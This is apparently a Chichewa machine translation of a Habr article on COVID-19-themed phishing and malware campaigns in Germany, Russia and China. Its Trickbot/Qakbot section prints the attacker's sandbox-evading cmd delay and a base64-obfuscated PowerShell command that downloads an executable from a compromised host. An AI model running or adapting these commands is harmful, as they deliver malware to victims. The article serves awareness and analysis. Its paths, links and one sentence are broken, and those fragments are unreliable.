Zigawenga zikupitilizabe kugwiritsa ntchito mutu wa COVID-19, ndikupanga ziwopsezo zochulukirachulukira kwa ogwiritsa ntchito omwe ali ndi chidwi ndi chilichonse chokhudzana ndi mliriwu. MU Takambirana kale za mtundu wanji wa pulogalamu yaumbanda yomwe idawonekera pambuyo pa coronavirus, ndipo lero tikambirana za njira zamaukadaulo zomwe ogwiritsa ntchito m'maiko osiyanasiyana, kuphatikiza Russia, adakumana nazo kale. Zochitika zonse ndi zitsanzo zili pansi pa odulidwa.
Kumbukirani mu Tidalankhula zakuti anthu akufunitsitsa kuwerenga osati za coronavirus komanso momwe mliriwu ukuyendera, komanso za njira zothandizira ndalama? Nachi chitsanzo chabwino. Kuwukira kosangalatsa kwachinyengo kudapezeka ku Germany ku North Rhine-Westphalia kapena NRW. Owukirawo adapanga makope a tsamba la Ministry of Economy (), komwe aliyense angapemphe thandizo lazachuma. Pulogalamu yotereyi ilipodi, ndipo idakhala yopindulitsa kwa azazambiri. Atalandira zambiri za omwe adazunzidwa, adafunsira patsamba lenileni lautumiki, koma adawonetsanso zina zakubanki. Malinga ndi zomwe boma likunena, zopempha zabodza za 4 zikwizikwi zidapangidwa mpaka chiwembucho chidapezeka. Zotsatira zake, $109 miliyoni yomwe cholinga chake chinali kuthandiza nzika zomwe zidakhudzidwa zidagwera m'manja mwa anthu achinyengo.
Kodi mungafune kuyezetsa kwaulere kwa COVID-19?
Chitsanzo china chodziwika bwino chachinyengo cha coronavirus-themed chinali mu maimelo. Mauthengawa adakopa chidwi cha ogwiritsa ntchito ndi mwayi woti ayesedwe kwaulere ngati ali ndi kachilombo ka coronavirus. M'malo mwa izi panali zochitika za Trickbot/Qakbot/Qbot. Ndipo pamene ofuna kufufuza thanzi lawo anayamba βkudzaza fomu yomwe yaikidwa,β mawu oipa anakopera pa kompyuta. Ndipo pofuna kupewa kuyezetsa sandboxing, script idayamba kutsitsa kachilomboka pakapita nthawi, pomwe machitidwe oteteza adatsimikiza kuti palibe zoyipa zomwe zingachitike.
Kutsimikizira ogwiritsa ntchito ambiri kuti athetse ma macros kunali kosavuta. Kuti muchite izi, chinyengo chokhazikika chinagwiritsidwa ntchito: kuti mudzaze mafunsowo, choyamba muyenera kutsegula macros, zomwe zikutanthauza kuti muyenera kuyendetsa VBA script.
Monga mukuwonera, script ya VBA imabisidwa mwapadera kuchokera ku ma antivayirasi.
Windows ili ndi gawo lodikirira pomwe pulogalamuyo imadikirira /T <seconds> musanavomereze yankho la "Inde". Kwa ife, script idadikirira masekondi 65 isanachotse mafayilo osakhalitsa:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ndipo ndikudikirira, pulogalamu yaumbanda idatsitsidwa. Cholemba chapadera cha PowerShell chinakhazikitsidwa pa izi:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pambuyo polemba mtengo wa Base64, script ya PowerShell imatsitsa kumbuyo komwe kuli pa seva yomwe idabedwa kale kuchokera ku Germany:
http://automatischer-staubsauger.com/feature/777777.pngndikusunga pansi pa dzina:
C:UsersPublictmpdirfile1.exe
foda βC:UsersPublictmpdirβ imachotsedwa pamene mukuyendetsa fayilo ya 'tmps1.bat' yomwe ili ndi lamulo cmd /c mkdir ""C:UsersPublictmpdir"".
Kuwukira kolunjika kwa mabungwe aboma
Kuphatikiza apo, ofufuza a FireEye posachedwapa adanenanso za kuukira kwa APT32 komwe kumayang'ana maboma ku Wuhan, komanso Unduna wa Zadzidzidzi zaku China. Imodzi mwa ma RTF omwe adagawidwa inali ndi ulalo wa nkhani ya New York Times yomwe ili ndi mutu . Komabe, atawerenga, pulogalamu yaumbanda idatsitsidwa (akatswiri a FireEye adazindikira kuti ndi METALJACK).
Chosangalatsa ndichakuti, panthawi yodziwika, palibe antivayirasi aliyense yemwe adazindikira izi, malinga ndi Virustotal.
Pamene masamba ovomerezeka ali pansi
Chitsanzo chochititsa chidwi kwambiri cha chiwembu chachinyengo chinachitika ku Russia tsiku lina. Chifukwa chake chinali kukhazikitsidwa kwa phindu lomwe lakhala likuyembekezeredwa kwa ana azaka zapakati pa 3 mpaka 16. Kuyamba kuvomereza zopempha kudalengezedwa pa Meyi 12, 2020, anthu mamiliyoni ambiri adathamangira patsamba la State Services kuti akalandire chithandizo chomwe akuyembekezera kwanthawi yayitali ndipo adatsitsa tsambalo moyipa kuposa kuukira kwa DDoS. Purezidenti atanena kuti "Ntchito za Boma sizitha kuthana ndi kuchuluka kwa zopempha," anthu adayamba kuyankhula pa intaneti za kukhazikitsidwa kwa tsamba lina lovomera mafomu.
Vuto ndilakuti masamba angapo adayamba kugwira ntchito nthawi imodzi, ndipo pomwe amodzi, enieniwo pa posobie16.gosuslugi.ru, amavomereza zofunsira, zambiri. .
Anzake a SearchInform adapeza madera 30 atsopano achinyengo mu zone ya .ru. Kampani ya Infosecurity ndi Softline yatsata mawebusayiti abodza opitilira 70 abodza kuyambira kumayambiriro kwa Epulo. Owalenga amagwiritsa ntchito zizindikiro zodziwika bwino komanso amagwiritsa ntchito mawu ophatikiza akuti gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ndi zina zotero.
Hype ndi social engineering
Zitsanzo zonsezi zimangotsimikizira kuti omwe akuukira akuchita bwino ndalama pamutu wa coronavirus. Ndipo kuchulukirachulukira kwamasewera komanso nkhani zosadziwikiratu, m'pamenenso azambara amakhala ndi mwayi woba zinthu zofunika kwambiri, kukakamiza anthu kusiya ndalama zawo pawokha, kapena kungobera makompyuta ambiri.
Ndipo poganizira kuti mliriwu wakakamiza anthu omwe angakhale osakonzekera kuti azigwira ntchito kunyumba zambiri, osati zaumwini, komanso zamakampani zomwe zili pachiwopsezo. Mwachitsanzo, posachedwapa ogwiritsa ntchito a Microsoft 365 (omwe kale anali Office 365) adakumananso ndi vuto lachinyengo. Anthu adalandira mauthenga akuluakulu "osowa" monga zomata pamakalata. Komabe, mafayilo analidi tsamba la HTML lomwe linatumiza omwe adazunzidwa . Zotsatira zake, kutayika kwa mwayi ndi kusokoneza deta yonse kuchokera ku akaunti.
Source: www.habr.com